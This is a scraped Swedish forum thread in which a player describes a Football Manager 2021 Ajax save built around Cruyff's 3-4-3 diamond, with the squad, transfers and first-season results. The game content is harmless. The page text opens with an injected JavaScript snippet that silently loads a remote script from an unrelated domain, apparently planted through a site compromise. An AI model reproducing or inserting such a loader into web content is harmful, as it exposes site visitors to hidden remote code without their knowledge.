;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] – Cruyff tillbaka i Ajax! – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM21] - Cruyff tillbaka i Ajax!

4 Inlägg
2 Users
14 Reactions
633 Visningar
(@korvkent)
Medlem
Blev medlem: 3 år sedan
Inlägg: 10
Topic starter  

 

Återuppståndelsen!

Johan Cruyff har återuppstått från de döda och ska föra Ajax tillbaka till Europatoppen!

 

Detta är premissen för min första serie med rapporter. Tanken är att jag ska försöka efterlikna den totalfotboll Cruyff använde sig av på 80-talet och skapa en stormakt.

 

Taktik

Cruyffs lag spelade oftast 4-3-3 eller en sorts 3-4-3. Formationen jag valt att använda är den Cruyff är mest känd för, 3-4-3 diamant. Alltså en 3-4-3a utan wingbacks som man brukar använda i dagens fotboll.
Poängen med taktiken är egentligen att så länge vi har bollen kan inte motståndarna göra mål. Till skillnad ifrån Barcelonas senare tiki-taka så är dock fokus mer på att göra mål, inte enbart hålla i bollen.
Cruyffs taktik gick i stort ut på att få planen att kännas stor när vi har bollen och att krympa alla ytor så fort motståndarna har bollinnehavet. Det krävs därför att vi använder både bredden och djupet när vi har bollen och så fort motståndarna får boll så pressar vi för att vinna tillbaka den. 

Istället för att använda wingbacks använde sig Cruyff av en bred 3 backslinje med egentligen bara 1 central försvarare och 2 defensiva ytterbackar. Dessa spelare ska vara spelskickliga för att kunna bygga spelet bakifrån, men också snabba och positionssäkra för att stoppa motståndarnas kontringar. Ytterbackarna ska vid uppspel hålla sig bredd för att dra isär motståndarnas försvar.

På mittfältet har vi 4 spelare, 1 defensiv och 3 offensiva. Den defensiva spelaren är hjärtat i hela lagbygget. Hans viktigaste attribut är smartness. Han ska veta när och vart bollen ska passas, när det är läge att avancera och när det är dags att lugna ner. Han ska också kunna kliva ner i backlinjen och täcka upp när en ytterback kliver fram.
De två centrala mittfältarna ska vara löpstarka och förhoppningsvis kreativa. De ska kunna följa med upp och gå i djupled men de ska också kunna hitta forwards eller yttrar med genomskärare. 
Spetsen på mittfältet är en skugganfallare. Detta innebär att han ofta ska gå i djupled, speciellt när strikern kliver ner för att möta boll. Han ska också ha egenskaper för att själv fixa ett mål. Genom antingen dribblingar eller ett distansskott. Han ska helt enkelt röra om i grytan och skapa mycket runt omkring sig.

Då har vi de 3 anfallarna kvar då. Yttrarna ska vara något slags mellanting av klassisk ytter och en inverterad ytter. De ska hålla bredden för att skapa ytor till resten av laget men när bollen hamnar i rätt läge ska de sticka mot mål för att skapa chanser.
Så kommer vi till anfallaren, 9an. Zlatan Ibrahimović , Marco van Basten, Patrick Kluivert och Luis Suárez är några som spelat 9a i Ajax genom historien. Under Cruyffs tid var det van Bastens plats. 
Detta måste vara en ganska komplett spelare då det krävs en hel del av honom. Han måste självklart kunna avsluta. Men han ska också kunna röra sig rätt, möta bollen, skapa ytor åt medspelare och servera dem.

 

Regler

För att behålla spelsätt och visioner har jag satt upp lite regler för mig själv.

  • Spela 3-4-3.
    Det är okej att tweaka formationen, men endast för att efterlikna Cruyffs spelsätt.
  • Bara värva spelare under 21. 
    På 80-talet köptes det inte så mycket spelare så jag försöker undvika detta. Helst bara ifrån europa.
  • Enda undantaget på värvningsfilosofin är att gamla Ajaxspelare får återvända.
  • Använd med andra ord ungdomsakademin mycket.

 

Mål

Målet är att vinna champions league. Att bli bäst i Europa helt enkelt.

 

 

https://imgur.com/JfOiaM3

Nu ska jag försöka få fram en taktik som liknar 3-4-3 diamant under försäsongen så återkommer jag med ett inlägg om spelarna, hur försäsongen sett ut samt den slutgiltiga taktiken.

 

Ajax kampioen van Europa!


   
Micke, El Payaso, raca14 and 1 people reacted
Citera
(@jzstrm)
Active Member
Blev medlem: 4 år sedan
Inlägg: 6
 

Låter otroligt intressant! Vill ha nästa inlägg redan nu!?


   
SvaraCitera
(@korvkent)
Medlem
Blev medlem: 3 år sedan
Inlägg: 10
Topic starter  

Taktik

Här kommer den slutgiltiga taktiken jag kommit fram till efter en knackig försäsong med lite olika tester.

https://imgur.com/asUq2iM

https://imgur.com/s9KvKM0

https://imgur.com/RGvqVRz

https://imgur.com/jSNzPBa

Jag provade spela med en mittback och två ytterbackar men gav ganska snabbt upp de försöken. Då vi läckte som ett såll. Det fick lov att bli tre centrala backar, som spelar brett.

Lite individuella instruktioner för spelarna är att yttrar och yttre mittbackar ska hålla bredden och att anfallaren och tian har lite firare tyglar. 

 

Truppen

Målvakter

André Onana, 24 år, Kamerun
Självskriven etta men tyvärr avstängd för doping fram till November.

NY IN! Tim Rönning, 21 år, Sverige
På grund av Onanas avstängning och att Stekelenburg skadade axeln i början av försäsongen så var jag tvungen att plocka in en reserv. Har goda erfarenheter av Rönning och tycker han passar bra in i bygget.

Maarten Stekelenburg, 38 år, Holland
Kommer förmodligen lägga av om 1-2 säsonger men bidrar bra med sin proffsighet och status i klubben. Trea efter Onana och Rönning.

Remko Pasveer, 37 år, Holland
Backup till resten. Hoppas kunna släppa annars får han sitta ut kontraktet.

 

Försvarare

UT! Nicolás Tagliafico, 28 år, Argentina
Superb ytterback men då jag spelar utan ytterbackar var det lika bra att släppa honom då intresse fanns. 

NY IN! Anel Ahmedhodžić, 21 år, Bosnien
Vara bara tvungen att norpa Anel innan han fyller 22! Haha. Tycker hans attribut passar in i Ajax. Ålder och spelsätt är perfekt och att Malmö släpper honom förhållandevis billigt är ju ett plus. Värvad för att spela till höger i backlinjen. Kanske redan från start.

Edson Álvarez, 23 år, Mexiko
Jämn och bra mittback som kommer spela de flesta matcherna som droppande mittback, centralt. Önskar han var lite snabbare men man kan inte få allt.

Lisandro Martínez, 22 år, Argentina
Väldigt spelskicklig vänsterfotad försvarare. Passar perfekt in till vänster i backlinjen. Kan även spela som defensivt spelfördelare på mittfältet.

Lisandro Magallán, 27 år, Argentina
Väldigt fysisk mittback som tyvärr saknar spelförståelsen för att platsa i förstaelvan. Kan eventuellt vara till salu om någon klubb dyker upp. Annars får han spela när det roteras eller behöver stänga matcher. Kraften finns där!

Perr Schuurs, 21 år, Holland
Lovande mittback som kommer få en del speltid när andra behöver vila. Står först i kö om någon startspelare säljs.

Jurriën Timber, 19 år, Holland
Även han en lovande mittback men ligger lite bakom Schuurs. Kommer få spela i B-laget denna säsong. Eventuellt få några matcher då andra vilar.

Devyne Rensch, 17 år, Holland
Det stora löftet i backlinjen. Högre höjd än både Schuurs och Timber men har en del kvar att lära. Väldigt spelskicklig och snabb.

 

Mittfältare

Daley Blind, 30 år, Holland
En av de stora ledarna och förebilderna i truppen. Kommer spela så många matcher som möjligt som den defensiva spelfördelaren. Extremt viktig!

Davy Klaassen, 27 år, Holland
Också han en stor ledare och viktig för laget. Inte bara outtröttlig utan också en helt okej målskytt. Kommer spela som löpstark mittfältare.

Ryan Gravenberch, 18 år, Holland
Det största underbarnet i klubben! Räknar kallt med att han blir en av de bästa centrala mittfältarna i världen inom en 4-5 års period. Spelar så många matcher som möjligt som mezzala.

Dušan Tadić, 32 år, Serbien
Vet inte om det är rätt att kalla Tadić för mittfältare men tanken är att han spelare som den offensiva spetsen i diamanten. Kommer vara totalt avgörande för våran säsong. Det är här allt ska hända.

Noussair Mazraoui, 23 år, Marocko
Är egentligen högerback men kommer att få spela defensiv mittfältare om det behövs. Är likt Tagliafico till salu om någon klubb kan tänkas betala. Duglig ersättare till Blind.

Mohammed Kudus, 20 år, Ghana
Lovande central mittfältare som kommer skolas in som mezzala. Bra fysiska attribut men behöver jobba på jämnheten. För tillfället ersättare när Gravenberch inte kan spela.

Sean Klaiber, 26 år, Holland
Truppspelare som kan spela på de flesta positioner. Är i grund och botten högerback men funkar på det centrala mittfältet. Kommer endast spela när hela truppen roteras.

Jurgen Ekkelenkamp, 20 år, Holland
Egen produkt som kan nå långt. Är för tillfället ett av alternativen både på centrala mittfältet och som tia. Kommer få en del speltid.

 

Anfallare

David Neres, 23 år, Brasilien
En riktig kanonspelare som håller till på högerkanten. Snabbheten och en vass vänsterfot borde ge både mål och assister.

Sébastien Haller, 26 år, Elfenbenskusten
Stor och stark anfallare som ska skapa ytor åt spelarna runt omkring honom. Kommer att spela som nia men känner att han inte kommer att hålla måttet för att vi ska ta det sista klivet. Denna säsong får han duga så får vi se om det blir någon uppgradering framöver.

NY IN! Kasper Dolberg, 23 år, Danmark
Dolberg hör ju bara hemma i Ajax. Kan ju inte springa runt i någon fransk skitklubb och göra mål. Fick betala ett jävla överpris men då vi saknar högerfotade yttrar i truppen fick det vara värt de. Det är honom jag vill ha! Kommer spela som vänsterytter, eventuellt någon match som nia.

Antony, 20 år, Brasilien
Efter Gravenberch det stora löftet. Kan spela på alla de offensiva positionerna. Kommer att ersätta Tadić eller Neres då någon av dessa inte kan spela. Kommer alltså få många minuter. Kanske han kan ta Hallers plats framöver?

Zakaria Labyad, 27 år, Marocko
Ersättare till Dolberg då han inte spelar. Är en helt klart duglig ytter men saknar speeden och avsluten för att vara på toppnivå.

Steven Berghuis, 28 år, Holland
Helt klart en bra ytter. Vänsterfotad som Antony så tyvärr hamnar han efter honom i rangordningen. Tror dock att det kan bli en del minuter speltid ändå då det kommer behöva roteras.

 

Övergångar

IN

Kasper Dolberg
250 miljoner + 100 miljoner avbetalning över 3 års tid + 100 miljoner efter 50 ligamatcher (Ja, jag vet att jag betalade ett sjukt överpris... Men jag behövde honom!)

Anel Ahmedhodžić
40 miljoner

Tim Rönning
35 miljoner

 

UT

Nicolás Tagliafico
275 miljoner

 

Försäsongen 

https://imgur.com/9425Uc4

Försäsongen bjöd på blandade resultat men gav ändå en del svar på taktiken samt spelarnas status. 

 

Gillar hur truppen är sammansatt och känner att startelvan håller bra klass. Blir svårt att nå slutrundorna i champions redan första säsongen men vi bygger för framtiden!

Nu rullar äntligen säsongen igång med start mot RKC Waalwijk i ligan!


   
jZstrM and raca14 reacted
SvaraCitera
(@korvkent)
Medlem
Blev medlem: 3 år sedan
Inlägg: 10
Topic starter  

Höst 20

Höstsäsongen är igång och öppningen i Eredivisie går lysande! 5 raka vinster och 17-1 i målskillnad!
Det är sedan dags för Champions league att dra igång. Förväntningarna för första säsongen är väl inte direkt så höga. Men förhoppningsvis klarar vi oss vidare ifrån gruppen. Det är en ganska jämn grupp med motståndarna AtalantaPorto och Shaktar. Tyvärr går det inte som planerat...
Första matchen är mot Shaktar hemma. Det löser sig till slut genom en 5-4 vinst där båda lagen följts åt hela vägen. Antony avgör i 88e minuten!
Nästa match, Porto borta. Det står länge 0-0 men i mitten av andra halvlek gör Porto både ett och två. Torsk 2-0.
Därefter är det dags för Atalanta borta. Förmodligen svåraste matchen i gruppspelet. Otroligt nog så gör vi 1-0 efter 3 minuter! Davy Klaassen följer med upp i anfallet och dunkar in en kasse. Atalanta svarar med att göra 1-1 en minut senare... Gosens gör sedan 2-1 innan första halvleken är över. Sen rullar det bara på... Slutar till slut med förlust med 5-1. Usch!
Bara 3 poäng när serien vänder men nu hemmamatcher mot topplagen. 
Det börjar med Atalanta på hemmaplan. Tyvärr slutar detta med ännu en torsk. 1-2 denna gång.
Och nu känns det ganska hopplöst. Atalanta och Porto har dragit ifrån så det får bli att rikta in sig på att bli 3a så att vi får Europa league till våren.
Förlust i nästa match mot Shaktar med 5-2 gör inte saken bättre.
I sista omgången måste vi vinna över Porto samtidigt som Shaktar inte får med sig en vinst mot Atalanta.
Detta löser vi tillslut med 5-2 mot Porto samtidigt som Atalanta spöar Shaktar.
Med andra ord slutar vi trea i gruppspelet, åker ur Champions och får spela vidare i Europa league.
En besvikelse men samtidigt är vi inte riktigt redo för Champions league ännu. Nästa säsong måste vi gå längre!

Hur gick det då i ligan under tiden?
Även här gick det lite knackigt då vi var tvugna att rotera laget en del. Redan efter första matchen i Champions bröts den inledande segersviten. PEC Zwolle stod för motståndet och vände 2-1 till 2-3 i slutminuterna. Första förlusten i ligan var ett faktum.
FC Utrecht hemma, vinst 2-0.
När vi sedan torskade mot vår sammarbetsklubb Sparta med 1-0 så fick det vara nog. I fortsättningen får vi rotera färre spelare för tillfället.
Det gav genast resultat och av de resterande 6 matcherna så vann vi 5. Endast en oavgjord borta mot N.E.C. Men så kan det gå ibland.

Slutsats

Champions league gick inget vidare men vi leder ligan. Får ändå ses som en okej start på säsongen. Nu är det bara bygga vidare på detta och göra oss redo för nästa säsongs Champions league!

https://imgur.com/tRrdUq3

 

 

Vår 21

Övergångar

Den nya året börjar med ett hett vinterfönster. Det har under hela säsongen varit ett stort intresse för Dušan Tadić och David Neres. Beslutar mig för att släppa Neres om ett tillräckligt stort bud kommer. Jag hade gärna behållt honom men risken om jag håller i han allt för hårt är att han börjar bråka sig bort, det är något jag alltid undviker. Till slut dyker ett bud från Mancherster United upp. 500 miljoner nu, 60 miljoner efter 50 matcher och 40% vidareförsäljningsklausul. Taget!
Tadić måste vi behålla och som tur är trillar det inte heller in några bud. Bra!
Släpper också Zakaria Labyad då vi hellre satsar på ungdomarna som rotationsspelare.
In kommer Killian Sardella ifrån Anderlecht. En 19 årig snabb mittback som förhoppningsvis kan bli något lite längre fram. 14 miljoner nu och 16 i avbetalningar. Kanske lite dyr för sin potential (endast 3 stjärnor) men jag ser en ljus framtid gå honom till mötes!
En bit in i säsongen öppnade sig också en möjlighet. En ersättare för David Neres behövs och helt plötsligt dyker Nicolò Zaniolo upp i scoutingcentret. Är detta på riktigt? 
Jag går all in utan att ens scouta honom ordentligt. Jag menar Zaniolo liksom, Nicolò fucking Zaniolo!
600 miljoner nu, ytterligare 400 i klausuler. Visst, helt sjukt dyrt men vad fan! Detta är en spelare som ska bära oss i 10 år framöver!
Roma accepterar och Zaniolo accepterar ett rimligt kontrakt.
Nicolò Zaniolo ansluter i Juli 2021!

Matcherna

Okej, tillbaka till matcherna under våren.

Med fullt fokus på ligan börjar det lite knackigt. Lyckas får 3-3 mot AZ då vi kviterar på övertid. Sen fortsätter det med två vinster och sedan en svidande förlust mot Heerenveen. Sen rullar det på igen! 5 raka vinster och det är dags för Europa league.

Vi är lottade mot Celtic och börjar hemma. 2-0 i halvtid och vi gör sedan 3-0 i andra halvlek. Det känns klart.
I returen på Celtic Park blir det lite värre... Vi lyckas inte få in bollen och vips så står det 2-0 till Celtic i 75e minuten. Det blir en tuff sista kvart men vi håller undan! Vidare!
Matchen efter så lottas vi mot Lyon som gått starkt. Obesegrade i både grupp och första utslagningsrundan. Den här gången har vi inte lika tur. Hemmamatchen slutar 0-0 och på bortaplan släpper vi in mål redan efter 13 minuter. Till slut vinner Lyon med 3-1 och vi är utslagna.

Under tiden i ligan så går det inte heller helt smärtfritt. 1 oavgjord, 1 vinst och 2 förluster under denna tid. Vi måste verkligen bredda truppen till nästa säsong för att klara av att slåss på två fronter. Hoppas på utvecklig hos ynglingarna så att de klarar att fylla ut truppen.

Vi har lyckats hålla oss kvar i toppen men Feyenoord har fått upp farten och skuggar tätt bakom. Tur då att spelschemat ser bra ut och det inte är något europaspel att tänka på. Det avslutande 7 matcherna resulterar i 6 segrar och en sur torsk mot Feyenoord just. Men vi lyckas hålla undan och vinner serien!

https://imgur.com/yNcrkaB


   
Micke reacted
SvaraCitera
Share: